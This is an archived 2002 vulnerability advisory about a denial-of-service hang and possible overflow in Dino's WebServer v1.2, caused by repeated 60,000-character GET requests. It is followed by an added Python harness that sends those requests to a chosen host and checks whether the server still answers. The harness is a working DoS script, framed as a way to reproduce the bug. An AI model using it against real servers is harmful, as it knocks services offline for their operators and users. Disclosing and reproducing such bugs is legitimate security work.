Dino's Webserver v1.2 DoS, possible overflow

From: 'ken'@FTU
Date: Mon Feb 18 2002 - 10:07:49 PST

    Dino's WebServer v1.2 is vulnerable to a Denial of Service attack with a
    possible buffer overflow or heap overflow.
    
    Explanation:
    Given a series of requests the server will hang at 99% CPU. To Dino's
    (actually, Anders G. Jensen's) credit, the priority is low enough that
    other programs appear to be taxed little by the CPU usage. The server
    cannot handle other requests and must be restarted. The server does not
    appear to recover automatically: after 10 minutes of my CPU running at
    almost 100%, I killed the program.
    
    It is my belief that the server may have a heap or buffer overflow.
    Usually the server handles long path names without problem, or so it
    seems. Dino's WebServer has a feature that allows the user to see the
    GET requests as they present themselves. The software contains a Log tag
    with a window. Almost every GET request is copied into this window.
    Since the application copies the request string the possibility exists
    that this copying leads to an overflow, and also the hang.
    
    Tested on:
    Windows 2000 Pro SP1
    Windows NT4.0 Work SP6  (clean install)
    
    Exploit:
    Please read carefully:
    The server does *not* hang if one sends a *single* request as follows:
    
    GET /<60,000 A's> HTTP/1.0
    
    The server *will* hang if this request is sent at least twice within the
    period of 1 or 2 seconds.
    
    I've played with smaller buffer sizes with mixed results.
    
    Dino was not contacted. (I could not find an email address.)
    
    
    'ken'@FTU
    
    
    -- 
    "I grew convinced that truth, sincerity and integrity in dealings 
    between man and man were of the utmost importance to the felicity of 
    life, and I formed a written resolution to practise them ever while I 
    lived."
    	-Benjamin Franklin, The Autobiography of Benjamin Franklin
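The request the post describes, packaged as a small reproduction harness. This is an added example, not code from the original message or from Dino's WebServer: it builds the oversized request line ("GET /<60,000 A's> HTTP/1.0"), sends it the number of times the post says triggers the hang, and then probes the server with an ordinary request to check whether it still answers, which is the observation the post relies on. The host and port arguments, the 0.5 second gap between sends, the socket timeouts and the liveness probe against "/" are assumptions of this example and do not come from the post; the post also only says the hang is a *possible* overflow, so a server that stops answering here tells you nothing about memory corruption on its own.

```python
"""Reproduction harness for the behaviour described in the post above.

Added example; not part of the original Bugtraq message. Assumptions not
taken from the post: host/port are supplied by the caller, requests are
spaced 0.5 s apart, socket timeouts are a few seconds, and liveness is
judged by whether "GET / HTTP/1.0" still yields a parseable status line.
"""
import socket
import time

PATH_LEN = 60_000  # figure from the post: "GET /<60,000 A's> HTTP/1.0"


def build_request(path_len: int = PATH_LEN, method: str = "GET") -> bytes:
    """Build the oversized HTTP/1.0 request line the post describes."""
    return f"{method} /{'A' * path_len} HTTP/1.0\r\n\r\n".encode("ascii")


def send_raw(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send raw bytes and return whatever the server sends back.

    Returns b"" if the server closes without answering; a read timeout is
    treated the same way, since a hung server simply never replies.
    """
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def status_code(response: bytes):
    """Return the HTTP status code from a raw response, or None if there is
    no well-formed status line (empty reply, garbage, or a hung server)."""
    line = response.split(b"\r\n", 1)[0]
    parts = line.split()
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return int(parts[1])
    return None


def server_alive(host: str, port: int, timeout: float = 5.0) -> bool:
    """Liveness probe: does an ordinary request still get a status line?"""
    try:
        resp = send_raw(host, port, b"GET / HTTP/1.0\r\n\r\n", timeout=timeout)
    except OSError:
        return False  # refused, reset, or connect timeout
    return status_code(resp) is not None


def reproduce(host: str, port: int, repeats: int = 2, gap: float = 0.5) -> bool:
    """Send the long request `repeats` times within the 1-2 s window the post
    gives, then report whether the server still answers a normal request.

    Returns True if the server is still alive afterwards, False if it has
    stopped responding (the symptom the post reports).
    """
    payload = build_request()
    for i in range(repeats):
        try:
            # Short timeout: we do not care about the reply, only about
            # getting the bytes onto the wire quickly enough.
            send_raw(host, port, payload, timeout=2.0)
        except OSError as exc:
            print(f"request {i + 1}: {exc}")
        time.sleep(gap)
    alive = server_alive(host, port)
    print("server still answers:", alive)
    return alive


if __name__ == "__main__":
    import sys
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    reproduce(target_host, target_port)
```

Run it only against a host you own; if `server_alive` reports False, confirm on the server side (CPU pinned, process still present) before attributing the result to the server rather than to the network or to a connection limit. Varying `PATH_LEN` and `repeats` is the way to explore the "smaller buffer sizes with mixed results" remark.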
    



    This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 15:38:17 PST